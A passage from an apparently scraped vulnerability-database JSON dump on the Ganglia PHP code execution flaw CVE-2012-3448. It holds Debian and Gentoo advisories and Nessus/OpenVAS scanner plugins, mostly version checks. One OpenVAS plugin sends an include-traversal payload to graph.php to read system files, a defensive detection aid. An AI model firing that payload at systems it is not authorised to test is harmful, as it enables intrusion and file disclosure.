Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/suhosin\", unaffected:make_list(\"ge 0.9.33\"), vulnerable:make_list(\"lt 0.9.33\"))) flag++;\nif (qpkg_check(package:\"net-analyzer/lft\", unaffected:make_list(\"ge 3.33\"), vulnerable:make_list(\"lt 3.33\"))) flag++;\nif (qpkg_check(package:\"x11-libs/vte\", unaffected:make_list(\"ge 0.32.2\", \"rge 0.28.2-r204\", \"rge 0.28.2-r206\"), vulnerable:make_list(\"lt 0.32.2\"))) flag++;\nif (qpkg_check(package:\"net-im/gg-transport\", unaffected:make_list(\"ge 2.2.4\"), vulnerable:make_list(\"lt 2.2.4\"))) flag++;\nif (qpkg_check(package:\"sys-cluster/ganglia\", unaffected:make_list(\"ge 3.3.7\"), vulnerable:make_list(\"lt 3.3.7\"))) flag++;\nif (qpkg_check(package:\"x11-misc/slock\", unaffected:make_list(\"ge 1.0\"), vulnerable:make_list(\"lt 1.0\"))) flag++;\nif (qpkg_check(package:\"www-apps/egroupware\", unaffected:make_list(\"ge 1.8.004.20120613\"), vulnerable:make_list(\"lt 1.8.004.20120613\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dev-php/suhosin / net-analyzer/lft / x11-libs/vte / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2610-1 security@debian.org\r\nhttp://www.debian.org/security/ Yves-Alexis Perez\r\nJanuary 21, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : ganglia\r\nVulnerability : arbitrary script execution\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2012-3448\r\nDebian Bug : 683584\r\n\r\nInsufficient input sanitization in Ganglia, a web based monitoring system,\r\ncould lead to remote PHP script execution with permissions of the user running\r\nthe web browser. \r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 3.1.7-1+squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem has been fixed in\r\nversion 3.3.8-1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 3.3.8-1.\r\n\r\nWe recommend that you upgrade your ganglia packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niQEcBAEBCgAGBQJQ/aXLAAoJEG3bU/KmdcClDXQH/RPc30ViDfDhv2CqsQ7o6xuI\r\nzhDAG0y1JJeJ8o70YDogUykzzGRZL57j9X98dcvtQGw4co65I0tGAXS+UgbSvHa0\r\nrCBk6tY+Gv7BptcXbTkeUnspn4YgAeHbMWTEz1aT1l2oIwoKTSL66Kl++gxSR7qp\r\nA1guGTRLW6sQDFG06Pf5Zt69W/fPZ8bhIhvJExrhXwzfn9WioNxetVdjSP/Ebc/c\r\nOPMCQ6X9Yk3fA8sJ1ZPdNz1aBE/JuJhVBMv0At07IxKdi8AHhIoATX6jT/YSJqYP\r\noAGsk89Jrs4NmStfTMes0sENOtxa7SvIFPZfSD6/v8LjaQMiOmiV1wSl9BgA+AA=\r\n=uUVF\r\n-----END PGP SIGNATURE-----", "modified": "2013-01-28T00:00:00", "published": "2013-01-28T00:00:00", "id": "SECURITYVULNS:DOC:28982", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28982", "title": "[SECURITY] [DSA 2610-1] ganglia security update", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2013-01-28T00:00:00", "published": "2013-01-28T00:00:00", "id": "SECURITYVULNS:VULN:12850", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12850", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:51:57", "bulletinFamily": "scanner", "description": "Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.", "modified": "2017-07-07T00:00:00", "published": "2013-01-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=892610", "id": "OPENVAS:892610", "title": "Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2610.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2610-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"ganglia on Debian Linux\";\ntag_insight = \"Ganglia is a scalable, real-time cluster monitoring environment\nthat collects cluster statistics in an open and well-defined XML\nformat.\";\ntag_solution = \"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.3.8-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.3.8-1.\n\nWe recommend that you upgrade your ganglia packages.\";\ntag_summary = \"Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892610);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-3448\");\n script_name(\"Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-01-21 00:00:00 +0100 (Mon, 21 Jan 2013)\");\n script_tag(name: \"cvss_base\", value:\"7.5\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2610.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-monitor-python\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.3.8-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:15", "bulletinFamily": "scanner", "description": "Ganglia is prone to a vulnerability that lets remote attackers execute\n arbitrary code.", "modified": "2018-10-10T00:00:00", "published": "2012-08-13T00:00:00", "id": "OPENVAS:1361412562310103535", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103535", "title": "Ganglia PHP Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ganglia_54699.nasl 11826 2018-10-10 14:38:27Z cfischer $\n#\n# Ganglia PHP Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ganglia:ganglia-web\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103535\");\n script_bugtraq_id(54699);\n script_cve_id(\"CVE-2012-3448\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11826 $\");\n script_name(\"Ganglia PHP Code Execution Vulnerability\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-10 16:38:27 +0200 (Wed, 10 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-13 12:40:50 +0200 (Mon, 13 Aug 2012)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ganglia_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"ganglia/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/54699\");\n script_xref(name:\"URL\", value:\"http://ganglia.sourceforge.net/\");\n script_xref(name:\"URL\", value:\"http://console-cowboys.blogspot.de/2012/07/extending-your-ganglia-install-with.html\");\n\n script_tag(name:\"summary\", value:\"Ganglia is prone to a vulnerability that lets remote attackers execute\n arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to execute arbitrary PHP code within\n the context of the affected web server process.\");\n\n script_tag(name:\"solution\", value:\"Vendor updates are available. Please see the references for more\n information.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\nif(dir == \"/\") dir = \"\";\n\nfiles = traversal_files();\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = dir + '/graph.php?g=cpu_report,include+%27/' + file + '%27';\n\n if(http_vuln_check(port:port, url:url, pattern:pattern)) {\n report = report_vuln_url(port:port, url:url);\n security_message(data:report, port:port);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:57", "bulletinFamily": "scanner", "description": "Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.", "modified": "2019-03-18T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310892610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892610", "title": "Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2610.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2610-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892610\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-3448\");\n script_name(\"Debian Security Advisory DSA 2610-1 (ganglia - arbitrary script execution)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 00:00:00 +0100 (Mon, 21 Jan 2013)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2610.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"ganglia on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.3.8-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.3.8-1.\n\nWe recommend that you upgrade your ganglia packages.\");\n script_tag(name:\"summary\", value:\"Insufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.1.7-1+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-monitor\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-monitor-python\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ganglia-webfrontend\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"gmetad\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libganglia1-dev\", ver:\"3.3.8-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:22", "bulletinFamily": "scanner", "description": "Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.", "modified": "2018-10-25T00:00:00", "published": "2017-03-21T00:00:00", "id": "OPENVAS:1361412562310140197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140197", "title": "Unspecified vulnerability in Ganglia Web before 3.5.1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ganglia_CVE-2012-3448.nasl 12095 2018-10-25 12:00:24Z cfischer $\n#\n# Unspecified vulnerability in Ganglia Web before 3.5.1\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ganglia:ganglia-web\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140197\");\n script_version(\"$Revision: 12095 $\");\n script_cve_id(\"CVE-2012-3448\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:00:24 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-21 11:57:25 +0100 (Tue, 21 Mar 2017)\");\n script_name(\"Unspecified vulnerability in Ganglia Web before 3.5.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_ganglia_detect.nasl\");\n script_mandatory_keys(\"ganglia/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3448\");\n\n script_tag(name:\"summary\", value:\"Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote attackers to execute arbitrary PHP code via unknown attack vectors.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"Ganglia Web before 3.5.1\");\n script_tag(name:\"solution\", value:\"Update to Ganglia Web before 3.5.1 or newer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nfix = '3.5.1';\n\nif( version_is_less( version:version, test_version:fix ) )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201412-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121296", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121296", "title": "Gentoo Security Advisory GLSA 201412-10", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201412-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121296\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:08 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-10\");\n script_tag(name:\"insight\", value:\"Vulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-10\");\n script_cve_id(\"CVE-2008-4776\", \"CVE-2010-2713\", \"CVE-2010-3313\", \"CVE-2010-3314\", \"CVE-2011-0765\", \"CVE-2011-2198\", \"CVE-2012-0807\", \"CVE-2012-0808\", \"CVE-2012-1620\", \"CVE-2012-2738\", \"CVE-2012-3448\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-apps/egroupware\", unaffected: make_list(\"ge 1.8.004.20120613\"), vulnerable: make_list(\"lt 1.8.004.20120613\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(\"ge 0.32.2\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(\"ge 0.28.2-r204\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(\"ge 0.28.2-r206\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-libs/vte\", unaffected: make_list(), vulnerable: make_list(\"lt 0.32.2\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-analyzer/lft\", unaffected: make_list(\"ge 3.33\"), vulnerable: make_list(\"lt 3.33\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-php/suhosin\", unaffected: make_list(\"ge 0.9.33\"), vulnerable: make_list(\"lt 0.9.33\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"x11-misc/slock\", unaffected: make_list(\"ge 1.0\"), vulnerable: make_list(\"lt 1.0\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"sys-cluster/ganglia\", unaffected: make_list(\"ge 3.3.7\"), vulnerable: make_list(\"lt 3.3.7\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-im/gg-transport\", unaffected: make_list(\"ge 2.2.4\"), vulnerable: make_list(\"lt 2.2.4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-10-24T22:41:43", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2610-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nJanuary 21, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ganglia\nVulnerability : arbitrary script execution\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-3448\nDebian Bug : 683584\n\nInsufficient input sanitization in Ganglia, a web based monitoring system,\ncould lead to remote PHP script execution with permissions of the user running\nthe web browser. \n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.1.7-1+squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 3.3.8-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.3.8-1.\n\nWe recommend that you upgrade your ganglia packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-01-21T20:34:09", "published": "2013-01-21T20:34:09", "id": "DEBIAN:DSA-2610-1:D545E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00014.html", "title": "[SECURITY] [DSA 2610-1] ganglia security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T07:09:04", 